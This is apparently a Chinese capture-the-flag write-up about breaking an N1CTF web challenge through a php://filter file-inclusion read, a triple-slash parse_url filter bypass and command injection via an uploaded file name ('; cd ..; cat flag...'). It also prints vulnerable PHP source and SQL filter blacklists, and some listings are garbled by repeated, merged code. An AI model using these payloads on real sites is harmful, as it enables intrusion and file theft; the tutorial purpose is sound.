信息收集
进入即是登录页面,抓包一看应该是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波
花一分钟扫下目录,发现一个viminfo和register.php
Viminfo文件是Vim用来记录退出时的状态
1. 200 /index.php 2. 200 /login.php 3. 200 /register.php 4. 200 /.viminfo 5. 403 /.htaccess 6. 7. vim updateadmin.php 8. vim info.php 9. vim login.php
发现一个info.php和updateadmin.php,访问的回显都是you can not visit it directly,我们先注册账号
注册admin时显示 Username has been registered!
查看URL似乎是文件包含?用伪协议读取下user源码看看
/user.php?page=php://filter/convert.base64-encode/resource=user
代码审计
1. <?php 2. require_once("function.php"); 3. if( !isset( $_SESSION['user'] )){ 4. Header("Location: index.php"); 5. 6. } 7. if($_SESSION['isadmin'] === '1'){ 8. $oper_you_can_do = $OPERATE_admin; 9. }else{ 10. $oper_you_can_do = $OPERATE; 11. } 12. //die($_SESSION['isadmin']); 13. if($_SESSION['isadmin'] === '1'){ 14. if(!isset($_GET['page']) || $_GET['page'] === ''){ 15. $page = 'info'; 16. }else { 17. $page = $_GET['page']; 18. } 19. } 20. else{ 21. if(!isset($_GET['page'])|| $_GET['page'] === ''){ 22. $page = 'guest'; 23. }else { 24. $page = $_GET['page']; 25. if($page === 'info') 26. { 27. // echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>"); 28. Header("Location: user.php?page=guest"); 29. } 30. } 31. } 32. filter_directory(); 33. //if(!in_array($page,$oper_you_can_do)){ 34. // $page = 'info'; 35. //} 36. include "$page.php"; 37. ?>
/user.php?page=php://filter/convert.base64-encode/resource=function
1. <?php 2. require_once("function.php"); 3. if( !isset( $_SESSION['user'] )){ 4. Header("Location: index.php"); 5. 6. } 7. if($_SESSION['isadmin'] === '1'){ 8. $oper_you_can_do = $OPERATE_admin; 9. }else{ 10. $oper_you_can_do = $OPERATE; 11. } 12. //die($_SESSION['isadmin']); 13. if($_SESSION['isadmin'] === '1'){ 14. if(!isset($_GET['page']) || $_GET['page'] === ''){ 15. $page = 'info'; 16. }else { 17. $page = $_GET['page']; 18. } 19. } 20. else{ 21. if(!isset($_GET['page'])|| $_GET['page'] === ''){ 22. $page = 'guest'; 23. }else { 24. $page = $_GET['page']; 25. if($page === 'info') 26. { 27. // echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php 28. session_start(); 29. require_once "config.php"; 30. function Hacker() 31. { 32. Header("Location: hacker.php"); 33. die(); 34. } 35. 36. 37. function filter_directory() 38. { 39. $keywords = ["flag","manage","ffffllllaaaaggg"]; 40. $uri = parse_url($_SERVER["REQUEST_URI"]); 41. parse_str($uri['query'], $query); 42. // var_dump($query); 43. // die(); 44. foreach($keywords as $token) 45. { 46. foreach($query as $k => $v) 47. { 48. if (stristr($k, $token)) 49. hacker(); 50. if (stristr($v, $token)) 51. hacker(); 52. } 53. } 54. } 55. 56. function filter_directory_guest() 57. { 58. $keywords = ["flag","manage","ffffllllaaaaggg","info"]; 59. $uri = parse_url($_SERVER["REQUEST_URI"]); 60. parse_str($uri['query'], $query); 61. // var_dump($query); 62. // die(); 63. foreach($keywords as $token) 64. { 65. foreach($query as $k => $v) 66. { 67. if (stristr($k, $token)) 68. hacker(); 69. if (stristr($v, $token)) 70. hacker(); 71. } 72. } 73. } 74. 75. function Filter($string) 76. { 77. global $mysqli; 78. $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password"; 79. $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><"; 80. for ($i = 0; $i < strlen($string); $i++) { 81. if (strpos("$whitelist", $string[$i]) === false) { 82. Hacker(); 83. } 84. } 85. if (preg_match("/$blacklist/is", $string)) { 86. Hacker(); 87. } 88. if (is_string($string)) { 89. return $mysqli->real_escape_string($string); 90. } else { 91. return ""; 92. } 93. } 94. 95. function sql_query($sql_query) 96. { 97. global $mysqli; 98. $res = $mysqli->query($sql_query); 99. return $res; 100. } 101. 102. function login($user, $pass) 103. { 104. $user = Filter($user); 105. $pass = md5($pass); 106. $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'"; 107. echo $sql; 108. $res = sql_query($sql); 109. // var_dump($res); 110. // die(); 111. if ($res->num_rows) { 112. $data = $res->fetch_array(); 113. $_SESSION['user'] = $data[username_which_you_do_not_know]; 114. $_SESSION['login'] = 1; 115. $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too]; 116. return true; 117. } else { 118. return false; 119. } 120. return; 121. } 122. 123. function updateadmin($level,$user) 124. { 125. $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' "; 126. echo $sql; 127. $res = sql_query($sql); 128. // var_dump($res); 129. // die(); 130. // die($res); 131. if ($res == 1) { 132. return true; 133. } else { 134. return false; 135. } 136. return; 137. } 138. 139. function register($user, $pass) 140. { 141. global $mysqli; 142. $user = Filter($user); 143. $pass = md5($pass); 144. $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')"; 145. $res = sql_query($sql); 146. return $mysqli->insert_id; 147. } 148. 149. function logout() 150. { 151. session_destroy(); 152. Header("Location: index.php"); 153. } 154. 155. ?>
/user.php?page=php://filter/convert.base64-encode/resource=config
1. <?php 2. require_once("function.php"); 3. if( !isset( $_SESSION['user'] )){ 4. Header("Location: index.php"); 5. 6. } 7. if($_SESSION['isadmin'] === '1'){ 8. $oper_you_can_do = $OPERATE_admin; 9. }else{ 10. $oper_you_can_do = $OPERATE; 11. } 12. //die($_SESSION['isadmin']); 13. if($_SESSION['isadmin'] === '1'){ 14. if(!isset($_GET['page']) || $_GET['page'] === ''){ 15. $page = 'info'; 16. }else { 17. $page = $_GET['page']; 18. } 19. } 20. else{ 21. if(!isset($_GET['page'])|| $_GET['page'] === ''){ 22. $page = 'guest'; 23. }else { 24. $page = $_GET['page']; 25. if($page === 'info') 26. { 27. // echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php 28. session_start(); 29. require_once "config.php"; 30. function Hacker() 31. { 32. Header("Location: hacker.php"); 33. die(); 34. } 35. 36. 37. function filter_directory() 38. { 39. $keywords = ["flag","manage","ffffllllaaaaggg"]; 40. $uri = parse_url($_SERVER["REQUEST_URI"]); 41. parse_str($uri['query'], $query); 42. // var_dump($query); 43. // die(); 44. foreach($keywords as $token) 45. { 46. foreach($query as $k => $v) 47. { 48. if (stristr($k, $token)) 49. hacker(); 50. if (stristr($v, $token)) 51. hacker(); 52. } 53. } 54. } 55. 56. function filter_directory_guest() 57. { 58. $keywords = ["flag","manage","ffffllllaaaaggg","info"]; 59. $uri = parse_url($_SERVER["REQUEST_URI"]); 60. parse_str($uri['query'], $query); 61. // var_dump($query); 62. // die(); 63. foreach($keywords as $token) 64. { 65. foreach($query as $k => $v) 66. { 67. if (stristr($k, $token)) 68. hacker(); 69. if (stristr($v, $token)) 70. hacker(); 71. } 72. } 73. } 74. 75. function Filter($string) 76. { 77. global $mysqli; 78. $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password"; 79. $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><"; 80. for ($i = 0; $i < strlen($string); $i++) { 81. if (strpos("$whitelist", $string[$i]) === false) { 82. Hacker(); 83. } 84. } 85. if (preg_match("/$blacklist/is", $string)) { 86. Hacker(); 87. } 88. if (is_string($string)) { 89. return $mysqli->real_escape_string($string); 90. } else { 91. return ""; 92. } 93. } 94. 95. function sql_query($sql_query) 96. { 97. global $mysqli; 98. $res = $mysqli->query($sql_query); 99. return $res; 100. } 101. 102. function login($user, $pass) 103. { 104. $user = Filter($user); 105. $pass = md5($pass); 106. $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'"; 107. echo $sql; 108. $res = sql_query($sql); 109. // var_dump($res); 110. // die(); 111. if ($res->num_rows) { 112. $data = $res->fetch_array(); 113. $_SESSION['user'] = $data[username_which_you_do_not_know]; 114. $_SESSION['login'] = 1; 115. $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too]; 116. return true; 117. } else { 118. return false; 119. } 120. return; 121. } 122. 123. function updateadmin($level,$user) 124. { 125. $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' "; 126. echo $sql; 127. $res = sql_query($sql); 128. // var_dump($res); 129. // die(); 130. // die($res); 131. if ($res == 1) { 132. return true; 133. } else { 134. return false; 135. } 136. return; 137. } 138. 139. function register($user, $pass) 140. { 141. global $mysqli; 142. $user = Filter($user); 143. $pass = md5($pass); 144. $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')"; 145. $res = sql_query($sql); 146. return $mysqli->insert_id; 147. } 148. 149. function logout() 150. { 151. session_destroy(); 152. Header("Location: index.php"); 153. } 154. 155. ?> 156. <?php 157. error_reporting(E_ERROR | E_WARNING | E_PARSE); 158. define(BASEDIR, "/var/www/html/"); 159. define(FLAG_SIG, 1); 160. $OPERATE = array('userinfo','upload','search'); 161. $OPERATE_admin = array('userinfo','upload','search','manage'); 162. $DBHOST = "localhost"; 163. $DBUSER = "root"; 164. $DBPASS = "Nu1LCTF2018!@#qwe"; 165. //$DBPASS = ""; 166. $DBNAME = "N1CTF"; 167. $mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME); 168. if(mysqli_connect_errno()){ 169. echo "no sql connection".mysqli_connect_error(); 170. $mysqli=null; 171. die(); 172. } 173. ?>
$keywords = ["flag","manage","ffffllllaaaaggg"]这三个页面可能有重要信息
parse_url解析漏洞
1. $keywords = ["flag","manage","ffffllllaaaaggg"]; 2. $uri = parse_url($_SERVER["REQUEST_URI"]); 3. parse_str($uri['query'], $query);
这里看下处理的逻辑
1. <?php 2. $a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest"; 3. $uri = parse_url($a); 4. print_r($uri); 5. //parse_str($uri[''], $query); 6. ?>
Array
(
[scheme] => http
[host] => 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn
[port] => 81
[path] => /user.php
[query] => page=guest
)
1. <?php 2. $a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest"; 3. $uri = parse_url($a); 4. //print_r($uri); 5. parse_str($uri['query'],$query); 6. print_r($query); 7. //parse_str($uri[''], $query); 8. ?>
Array
(
[page] => guest
)
我们这里查到PHP版本是5.5.9
这里利用parse_url解析漏洞
///user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
1. <?php 2. if (FLAG_SIG != 1){ 3. die("you can not visit it directly"); 4. }else { 5. echo "you can find sth in m4aaannngggeee"; 6. } 7. ?>
///user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
1. <?php 2. if (FLAG_SIG != 1){ 3. die("you can not visit it directly"); 4. } 5. include "templates/upload.html"; 6. ?>
尝试上传文件,上传失败。发现/templates/upllloadddd.php
读upllloadddd的源码
1. <?php 2. $allowtype = array("gif","png","jpg"); 3. $size = 10000000; 4. $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/"; 5. $filename = $_FILES['file']['name']; 6. if(is_uploaded_file($_FILES['file']['tmp_name'])){ 7. if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){ 8. die("error:can not move"); 9. } 10. }else{ 11. die("error:not an upload fileï¼"); 12. } 13. $newfile = $path.$filename; 14. echo "file upload success<br />"; 15. echo $filename; 16. $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0"); 17. echo "<img src='data:image/png;base64,".$picdata."'></img>"; 18. if($_FILES['file']['error']>0){ 19. unlink($newfile); 20. die("Upload file error: "); 21. } 22. $ext = array_pop(explode(".",$_FILES['file']['name'])); 23. if(!in_array($ext,$allowtype)){ 24. unlink($newfile); 25. } 26. ?>
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
现在需要找到上传点,莫非是之前的user.php?page=updateadmin吗?发现也没有上传处,最后看wp发现上传点在/user.php?page=m4aaannngggeee,看两者的页面貌似是继承来的?
貌似不能加/
filename=;cd ..;ls ;#
;cd ..;cat flag_233333;#
